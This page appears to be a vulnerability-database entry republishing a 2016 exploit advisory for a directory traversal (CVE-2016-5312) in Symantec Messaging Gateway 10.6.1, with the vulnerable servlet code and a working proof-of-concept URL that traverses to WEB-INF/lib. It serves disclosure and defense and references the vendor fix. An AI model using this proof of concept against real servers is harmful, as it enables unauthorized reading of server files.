Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormR-73eNPACKETSTORM:138891
HistorySep 28, 2016 - 12:00 a.m.

Symantec Messaging Gateway 10.6.1 Directory Traversal

2016-09-2800:00:00
R-73eN
packetstormsecurity.com
27

0.962 High

EPSS

Percentile

99.5%

JSON
`# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal  
# Date : 28/09/2016  
# Author : R-73eN  
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)  
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway  
# Vendor : Symantec  
# CVE : CVE-2016-5312  
# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00  
#   
# ___ __ ____ _ _   
# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |   
# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |   
# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___   
# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|  
#  
#  
# DESCRIPTION:  
#  
# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests.   
# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory.   
# This could potentially provide read access to some files/directories on the server for which the user is not authorized.  
#  
The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java  
The vulnerable code is  
extends HttpServlet {  
public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {  
block6 : {  
try {  
String string = httpServletRequest.getParameter("sn");   
//**** Taking parameter "sn" and writing it to the "string variable"  
  
  
if (string == null) break block6;  
String string2 = string.substring(string.length() - 3);  
  
byte[] arrby = (byte[])this.getServletContext().getAttribute(string);   
  
//**** The string variable is passed here without any sanitanization for directory traversal  
//**** and you can successfully use this to do a directory traversal.  
  
if (arrby != null) {  
httpServletResponse.setContentType("image/" + string2);  
ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();  
httpServletResponse.setContentLength(arrby.length);  
servletOutputStream.write(arrby);  
this.getServletContext().removeAttribute(string);  
break block6;  
}  
  
  
POC:   
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib  
  
`

Related

exploitpack 1
zdt 1
cvelist 1
nvd 1
openvas 1
symantec 1
dsquare 1
cve 1
prion 1
exploitdb 1
nessus 1
exploitpack
exploitpack
Symantec Messaging Gateway 10.6.1 - Directory Traversal
2016-09-28 00:00:00
zdt
zdt
Symantec Messaging Gateway 10.6.1 - Directory Traversal
2016-09-28 00:00:00
cvelist
cvelist
CVE-2016-5312
2017-04-14 18:00:00
nvd
nvd
CVE-2016-5312
2017-04-14 18:59:00
openvas
openvas
Symantec Messaging Gateway Directory Traversal Vulnerability (SYM16-016) - Active Check
2016-09-30 00:00:00
symantec
symantec
Symantec Messaging Gateway Security Update
2016-09-27 08:00:00
dsquare
dsquare
Symantec Messaging Gateway 10.6.1 File Disclosure
2018-07-07 00:00:00
cve
cve
CVE-2016-5312
2017-04-14 18:59:00
prion
prion
Directory traversal
2017-04-14 18:59:00
exploitdb
exploitdb
Symantec Messaging Gateway 10.6.1 - Directory Traversal
2016-09-28 00:00:00
nessus
nessus
Symantec Messaging Gateway 10.x < 10.6.2 Multiple Vulnerabilities (SYM16-015) (SYM16-016)
2016-09-22 00:00:00

0.962 High

EPSS

Percentile

99.5%

JSON
Related for PACKETSTORM:138891
exploitpack1zdt1cvelist1nvd1openvas1symantec1dsquare1cve1prion1exploitdb1nessus1